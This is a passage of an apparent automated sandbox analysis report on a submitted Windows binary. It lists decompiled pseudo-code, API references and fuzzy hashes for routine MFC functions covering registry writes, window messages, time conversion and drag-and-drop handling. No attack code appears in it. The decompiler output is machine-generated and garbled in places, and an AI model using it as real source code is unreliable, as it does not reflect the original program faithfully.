                  0x0041c667
                  0x0041c667
                  0x0041c66e
                  0x0041c673
                  0x0041c676
                  0x0041c67d
                  0x0041c67f
                  0x0041c68a
                  0x0041c698
                  0x0041c69a
                  0x0041c6a8
                  0x0041c6bb
                  0x0041c6bd
                  0x0041c6c2
                  0x0041c6df
                  0x0041c6c4
                  0x0041c6cb
                  0x0041c6d0
                  0x0041c6e9
                  0x0041c6fc
                  0x0041c6fc
                  0x0041c6e9
                  0x0041c708
                  0x0041c712

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041C66E
                  • swprintf.LIBCMT ref: 0041C6CB
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0041C6DF
                  • SendMessageA.USER32(00000362,00000362,00000000,?), ref: 0041C6FC
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_MessageSend__vsprintf_s_l
                  • String ID:
                  • API String ID: 2549095532-0
                  • Opcode ID: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction ID: 976522213fad21206c224ef94300dd4b8a2a06ebd09c969b271b5d7d8602737c
                  • Opcode Fuzzy Hash: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction Fuzzy Hash: 07115172A40308ABDB10EBE5CC86F9E77B9AF08754F114516F509AB291E738EA50CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004265DF, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E004265DF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x463404; // 0x18eab29f
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v24, 0x10, 0x452000, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
				} else {
					_t30 = E0042652C(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E00430650(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                  0x004265df
                  0x004265e7
                  0x004265ee
                  0x004265f2
                  0x004265f6
                  0x004265fd
                  0x00426600
                  0x00426640
                  0x00426651
                  0x00426602
                  0x00426608
                  0x0042660c
                  0x0042661a
                  0x00426621
                  0x00426623
                  0x0042662d
                  0x0042662d
                  0x0042660c
                  0x00426665

                  APIs
                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0042661A
                  • RegCloseKey.ADVAPI32(00000000), ref: 00426623
                  • swprintf.LIBCMT ref: 00426640
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00426651
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction ID: e4b09b4b087a4c94818457906bb1b79e27778f0661a387acb9e5ce4406507e57
                  • Opcode Fuzzy Hash: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction Fuzzy Hash: A5010472600218BBD7109F659C46FBFB7ACEF48714F51042BFA00A3181DAB8ED018768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00411046, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00411046(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;

				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x188))();
				}
				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
				E0040F918(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E004105B2(_t19, _t19, 0);
				_t26 = _t20;
				if(_t20 == 0) {
					E00406436(_t20, _t22, 0, SendMessageA, _t26);
				}
				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
				E0040F918(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}









                  0x00411046
                  0x0041104a
                  0x00411057
                  0x0041105b
                  0x0041105d
                  0x0041105d
                  0x00411072
                  0x0041107f
                  0x00411084
                  0x0041108b
                  0x0041108d
                  0x0041108f
                  0x00411091
                  0x00411091
                  0x0041109d
                  0x004110aa
                  0x004110af
                  0x004110b7
                  0x00000000
                  0x004110be
                  0x004110c3

                  APIs
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00411072
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0041109D
                  • GetCapture.USER32 ref: 004110AF
                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004110BE
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: 185650b8f563500d27f63686088aac245195dfa97b6177c27bbaf04c667e405a
                  • Instruction ID: 17e571b5f7ff4c9ef8489950eafba025f931e03d8fe3bfc599a458d3e8fa3cf5
                  • Opcode Fuzzy Hash: 185650b8f563500d27f63686088aac245195dfa97b6177c27bbaf04c667e405a
                  • Instruction Fuzzy Hash: 640175317402947BDB301B638CCDFDB3E7AEBCAB50F110079B705AA1E7C9A54880D664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042E37E, Relevance: 6.1, APIs: 4, Instructions: 54timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0042E37E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __ebp;
				int _t23;
				int _t25;
				void* _t38;
				void* _t40;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t30 = __ebx;
				_t44 = _a8;
				if(_a8 == 0) {
					E00406436(__ebx, __ecx, __edi, __esi, _t44);
				}
				_push(_t40);
				_v28.wYear = E0042E146();
				_v28.wMonth = E0042E169();
				_v28.wDay = E0042E188();
				_v28.wHour = E0042E1A6();
				_v28.wMinute = E0042E1C5();
				_v28.wSecond = E0042E1E4();
				_v28.wMilliseconds = 0;
				_t23 = SystemTimeToFileTime( &_v28,  &_v12);
				_t42 = GetLastError;
				if(_t23 == 0) {
					E0042EAA8(_t30, _t38, _t39, GetLastError, GetLastError(), 0);
				}
				_t25 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t25 == 0) {
					_t25 = E0042EAA8(_t30, _t38, _t39, _t42, GetLastError(), _t25);
				}
				return _t25;
			}










                  0x0042e37e
                  0x0042e37e
                  0x0042e37e
                  0x0042e37e
                  0x0042e386
                  0x0042e38a
                  0x0042e38c
                  0x0042e38c
                  0x0042e391
                  0x0042e39e
                  0x0042e3a9
                  0x0042e3b4
                  0x0042e3bf
                  0x0042e3ca
                  0x0042e3d3
                  0x0042e3d9
                  0x0042e3e5
                  0x0042e3eb
                  0x0042e3f3
                  0x0042e3fa
                  0x0042e3fa
                  0x0042e406
                  0x0042e40e
                  0x0042e414
                  0x0042e414
                  0x0042e41b

                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042E3E5
                  • GetLastError.KERNEL32(00000000), ref: 0042E3F7
                  • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 0042E406
                  • GetLastError.KERNEL32(00000000), ref: 0042E411
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Time$File$ErrorLast$Exception@8H_prolog3LocalSystemThrow
                  • String ID:
                  • API String ID: 821146650-0
                  • Opcode ID: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction ID: 7f314973e1ded6b7ef5a961ee441c8429dab474b5b76dc5320eba2664e5a75b7
                  • Opcode Fuzzy Hash: 01c99723038ad47921689631886dd98cb9011c0b6efba3e1e3db2276f9bfe786
                  • Instruction Fuzzy Hash: 6A111E25F10229A7DF10BBF79C055AE77BDAF44718F80506BA901A7351EA788A1087DD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040918B, Relevance: 6.1, APIs: 4, Instructions: 53fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E0040918B(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
				signed int _v8;
				char _v268;
				signed int _v272;
				int _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t48;
				void* _t51;

				_t51 = __eflags;
				_t38 = __edx;
				_t33 = __ecx;
				_t46 = _t48;
				_t18 =  *0x463404; // 0x18eab29f
				_v8 = _t18 ^ _t48;
				_t31 = _a4;
				_push(_t39);
				E0040EE3C(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
				_v276 = DragQueryFileA(_t31, 0xffffffff, 0, 0);
				_t24 = E0041F363(_t31, _t39, DragQueryFileA, _t51);
				_v272 = _v272 & 0x00000000;
				_t40 =  *((intOrPtr*)(_t24 + 4));
				if(_v276 > 0) {
					do {
						DragQueryFileA(_t31, _v272,  &_v268, 0x104);
						 *((intOrPtr*)( *_t40 + 0x88))( &_v268);
						_v272 = _v272 + 1;
						_t24 = _v272;
					} while (_v272 < _v276);
				}
				DragFinish(_t31);
				_pop(_t41);
				_pop(_t44);
				_pop(_t32);
				return E00430650(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
			}





















                  0x0040918b
                  0x0040918b
                  0x0040918b
                  0x0040918e
                  0x00409196
                  0x0040919d
                  0x004091a1
                  0x004091a5
                  0x004091b2
                  0x004091c6
                  0x004091cc
                  0x004091d1
                  0x004091df
                  0x004091e2
                  0x004091e4
                  0x004091f7
                  0x00409204
                  0x0040920a
                  0x00409210
                  0x00409216
                  0x004091e4
                  0x0040921f
                  0x00409228
                  0x00409229
                  0x0040922c
                  0x00409233

                  APIs
                  • SetActiveWindow.USER32(?), ref: 004091AB
                  • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 004091C4
                  • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004091F7
                  • DragFinish.SHELL32(?), ref: 0040921F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction ID: 0dbc43127ea2ce8ae02b0a4d7d8f7e2c132127b2c2e01dcd9ff7c6f5005a244b
                  • Opcode Fuzzy Hash: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction Fuzzy Hash: E011A375A00118ABCB109F65CC45FDDB7B8FB59314F1045EAE559A3291CBB4AE808F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00428E59, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00428E59(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				void* _t29;
				intOrPtr* _t31;
				void* _t33;
				void* _t35;

				_t29 = __edx;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E00404461(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t31 = 0;
					__eflags = 0;
				} else {
					_t31 = E00428E3A(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t35 = _t33;
				if(_t13 == 0) {
					if(_t31 != 0) {
						 *((intOrPtr*)( *_t31 + 4))(1);
					}
					E0042EAA8(_t23, _t29, _t31, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t31 + 4)) = _v8;
				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t31;
			}















                  0x00428e59
                  0x00428e5e
                  0x00428e63
                  0x00428e65
                  0x00428e6b
                  0x00428e6d
                  0x00428e7a
                  0x00428e7a
                  0x00428e6f
                  0x00428e76
                  0x00428e76
                  0x00428e8d
                  0x00428e96
                  0x00428e9c
                  0x00428e9f
                  0x00428ea3
                  0x00428eab
                  0x00428eab
                  0x00428eb8
                  0x00428eb8
                  0x00428ec0
                  0x00428ec6
                  0x00428ece

                  APIs
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00428E8D
                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00428E93
                  • DuplicateHandle.KERNEL32(00000000), ref: 00428E96
                  • GetLastError.KERNEL32(?), ref: 00428EB1
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                  • String ID:
                  • API String ID: 3704204646-0
                  • Opcode ID: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction ID: af5f4325da4a8d9e4f0321186dcae96371d0d4a3212ff4cde42e699575839eef
                  • Opcode Fuzzy Hash: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction Fuzzy Hash: 4201BC35700210ABDB10ABA6EC49F1E7BACFBC4750F55846AB904CB291DB74DC018B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042EDD4, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0042EDD4(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E0041FDA4(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E0041FE4A(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                  0x0042edd4
                  0x0042eddb
                  0x0042ede1
                  0x0042ede4
                  0x0042ede7
                  0x0042edea
                  0x0042eded
                  0x0042edf3
                  0x0042edf7
                  0x0042ee01
                  0x0042ee05
                  0x0042ee1c
                  0x0042ee2e
                  0x0042ee32
                  0x0042ee41
                  0x0042ee41
                  0x0042ee34
                  0x0042ee35
                  0x0042ee3d
                  0x0042ee3f
                  0x00000000
                  0x00000000
                  0x0042ee3f
                  0x0042ee13
                  0x0042ee13
                  0x0042ee13
                  0x0042ee43
                  0x0042ee46

                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042EDED
                  • GetParent.USER32(00000000), ref: 0042EDFB
                  • ScreenToClient.USER32 ref: 0042EE1C
                  • IsWindowEnabled.USER32(00000000), ref: 0042EE35
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction ID: b4a697f47c67ab9837afbcedfbb94ed47278685bea9992d24b7a779d1c0570bb
                  • Opcode Fuzzy Hash: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction Fuzzy Hash: 00018436700524BF87129B9AEC05DAF7BB9EFCA700B59002AF905D7310EB39CD019769
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404697, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404697(void* __ecx, struct HMENU__* _a4) {
				int _v8;
				struct HMENU__* _v12;
				struct HMENU__* _t8;
				int _t9;
				int _t11;
				int _t12;
				int _t16;
				struct HMENU__* _t19;

				if(_a4 != 0) {
					_t8 = GetMenuItemCount(_a4);
					while(_t8 != 0) {
						_t9 = _t8 - 1;
						_v12 = _t9;
						_t19 = GetSubMenu(_a4, _t9);
						if(_t19 == 0) {
							L8:
							_t8 = _v12;
							continue;
						}
						_t11 = GetMenuItemCount(_t19);
						_t16 = 0;
						_v8 = _t11;
						if(_t11 <= 0) {
							goto L8;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_t12 = GetMenuItemID(_t19, _t16);
							if(_t12 >= 0xe130 && _t12 <= 0xe13f) {
								break;
							}
							_t16 = _t16 + 1;
							if(_t16 < _v8) {
								continue;
							}
							goto L8;
						}
						_t8 = _t19;
						break;
					}
					return _t8;
				}
				return 0;
			}











                  0x004046a2
                  0x004046b4
                  0x004046f7
                  0x004046b8
                  0x004046bd
                  0x004046c6
                  0x004046ca
                  0x004046f4
                  0x004046f4
                  0x00000000
                  0x004046f4
                  0x004046cd
                  0x004046cf
                  0x004046d1
                  0x004046d6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004046d8
                  0x004046d8
                  0x004046da
                  0x004046e5
                  0x00000000
                  0x00000000
                  0x004046ee
                  0x004046f2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004046f2
                  0x00404702
                  0x00000000
                  0x00404702
                  0x00000000
                  0x004046fd
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CountItemMenu
                  • String ID:
                  • API String ID: 1409047151-0
                  • Opcode ID: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction ID: 8276e2b91934d31df3356f8f8f605792c0e2d79c3701d85367bebcb7180b13e2
                  • Opcode Fuzzy Hash: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction Fuzzy Hash: A001F2B5900109BFDB004B65CC8486F7AA9EBD3344F610837EA01F3290FA7ECD41AA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043E6D3, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0043E6D3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0043DFC4(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0043E0B4(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0043E5D9(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0043E51E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                  0x0043e6d8
                  0x0043e6de
                  0x0043e751
                  0x00000000
                  0x0043e6e5
                  0x0043e6e5
                  0x0043e6e8
                  0x0043e703
                  0x0043e706
                  0x0043e726
                  0x0043e738
                  0x0043e708
                  0x0043e708
                  0x0043e70b
                  0x00000000
                  0x0043e70d
                  0x0043e71f
                  0x0043e71f
                  0x0043e70b
                  0x0043e756
                  0x0043e75a
                  0x0043e6ea
                  0x0043e702
                  0x0043e702
                  0x0043e6e8

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 599c970f0d7140b4d8948086046bd40c7f1d60777e1d6830c4359a05df86eb3f
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: 4F11803240114EBBCF265EC6CC41CEE3F22BB0C394F189416FA18591B1D73AD9B2AB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F188, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0040F188(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E0040F188(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E0040EE3C(_t13, _t14);
						}
						_t10 = E0040EE68(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0040F188(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}











                  0x0040f188
                  0x0040f188
                  0x0040f195
                  0x0040f19b
                  0x0040f1a1
                  0x0040f1a5
                  0x0040f1d5
                  0x0040f1d8
                  0x0040f1f5
                  0x0040f1f5
                  0x0040f1f7
                  0x0040f1f9
                  0x00000000
                  0x00000000
                  0x0040f1e3
                  0x0040f1e8
                  0x0040f1ea
                  0x0040f1ef
                  0x00000000
                  0x0040f1ef
                  0x00000000
                  0x0040f1ea
                  0x0040f1a7
                  0x0040f1ac
                  0x0040f1be
                  0x0040f1c2
                  0x0040f1c3
                  0x00000000
                  0x0040f1c5
                  0x0040f1cc
                  0x0040f1d1
                  0x0040f1d3
                  0x00000000
                  0x00000000
                  0x0040f1ae
                  0x0040f1b5
                  0x0040f1bc
                  0x00000000
                  0x00000000
                  0x0040f1bc
                  0x0040f1ac
                  0x0040f1fe
                  0x0040f1fe

                  APIs
                  • GetDlgItem.USER32 ref: 0040F195
                  • GetTopWindow.USER32(00000000), ref: 0040F1A8
                    • Part of subcall function 0040F188: GetWindow.USER32(00000000,00000002), ref: 0040F1EF
                  • GetTopWindow.USER32(?), ref: 0040F1D8
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
